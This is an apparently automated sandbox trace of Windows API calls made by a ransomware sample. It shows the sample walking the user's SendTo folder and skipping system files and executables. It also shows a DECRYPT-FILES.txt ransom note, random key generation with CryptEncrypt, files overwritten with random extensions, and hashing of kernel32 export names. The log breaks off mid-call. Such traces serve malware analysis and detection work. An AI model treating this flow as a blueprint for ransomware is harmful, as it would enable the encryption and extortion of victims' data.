[0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="ntuser.dat.log") returned -1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="thumbs.db") returned -1 [0182.294] lstrcmpiW (lpString1="ii_H.lnk", lpString2="Bootfont.bin") returned 1 [0182.294] lstrlenW (lpString="ii_H.lnk") returned 8 [0182.294] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0182.294] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6a1a70, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a6a1a70, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a6a1a70, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="iKm6.lnk", cAlternateFileName="")) returned 1 [0182.294] lstrcmpiW (lpString1="iKm6.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0182.301] lstrcatW (in: lpString1="SendTo", lpString2="\\" | out: lpString1="SendTo\\") returned="SendTo\\" [0182.301] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Program Files") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch=":\\Windows") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Games\\") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\All Users") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="AhnLab") returned 0x0 [0182.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.301] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0182.301] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.301] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\0a16c9.tmp") returned 82 [0182.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0182.304] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.304] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\DECRYPT-FILES.txt") returned 89 [0182.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0182.304] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0182.304] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefaec160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefaec160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.304] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefaec160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefaec160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.304] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.304] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.304] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xefaec160, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefaec160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefaec160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.304] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.304] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.304] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.304] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.305] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.305] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.305] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.305] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.305] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.305] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.305] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.305] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.305] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.305] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.305] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0182.305] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.305] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0182.305] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\0a16c9.tmp" [0182.305] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.305] CloseHandle (hObject=0x0) returned 0 [0182.305] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.306] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xac135240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", cAlternateFileName="COMPRE~1.YM1")) returned 1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="DECRYPT-FILES.txt") returned -1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="autorun.inf") returned 1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="boot.ini") returned 1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="desktop.ini") returned -1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="ntuser.dat") returned -1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="iconcache.db") returned -1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="bootsect.bak") returned 1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="ntuser.dat.log") returned -1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="thumbs.db") returned -1 [0182.306] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ", lpString2="Bootfont.bin") returned 1 [0182.306] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ") returned 47 [0182.306] lstrcmpiW (lpString1="yM1yQ", lpString2="lnk") returned 1 [0182.306] lstrcmpiW (lpString1="yM1yQ", lpString2="exe") returned 1 [0182.306] lstrcmpiW (lpString1="yM1yQ", lpString2="sys") returned 1 [0182.306] lstrcmpiW (lpString1="yM1yQ", lpString2="dll") returned 1 [0182.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 71 [0182.306] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ") returned 47 [0182.306] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0182.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Compressed (zipped) Folder.ZFSendToTarget.yM1yQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ" [0182.306] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.yM1yQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.ym1yq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.307] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=267) returned 1 [0182.307] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.307] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.307] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0182.307] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0182.307] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.308] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0182.308] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0182.308] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.308] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.309] CloseHandle (hObject=0x280) returned 1 [0182.309] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.309] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0182.310] CloseHandle (hObject=0x0) returned 0 [0182.310] CloseHandle (hObject=0x27c) returned 1 [0182.310] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.311] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.311] GetTickCount () returned 0x1134f78 [0182.311] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.311] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0182.311] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0182.311] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.312] lstrlenA (lpString="kernel32.dll") returned 12 [0182.312] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0182.312] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0182.312] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0182.312] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0182.312] lstrlenA (lpString="ADDATOMA") returned 8 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0182.312] lstrlenA (lpString="ADDATOMW") returned 8 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0182.312] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0182.312] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0182.312] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0182.312] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0182.312] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0182.312] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0182.312] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0182.313] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0182.313] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0182.313] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0182.313] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0182.313] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0182.313] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0182.313] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0182.313] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0182.313] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0182.313] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0182.313] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0182.313] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0182.313] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0182.313] lstrlenA (lpString="BACKUPREAD") returned 10 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0182.313] lstrlenA (lpString="BACKUPSEEK") returned 10 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0182.313] lstrlenA (lpString="BACKUPWRITE") returned 11 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0182.313] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0182.313] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0182.313] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0182.314] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0182.314] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0182.314] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0182.314] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0182.314] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0182.314] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0182.314] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0182.314] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0182.314] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0182.314] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0182.314] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0182.314] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") 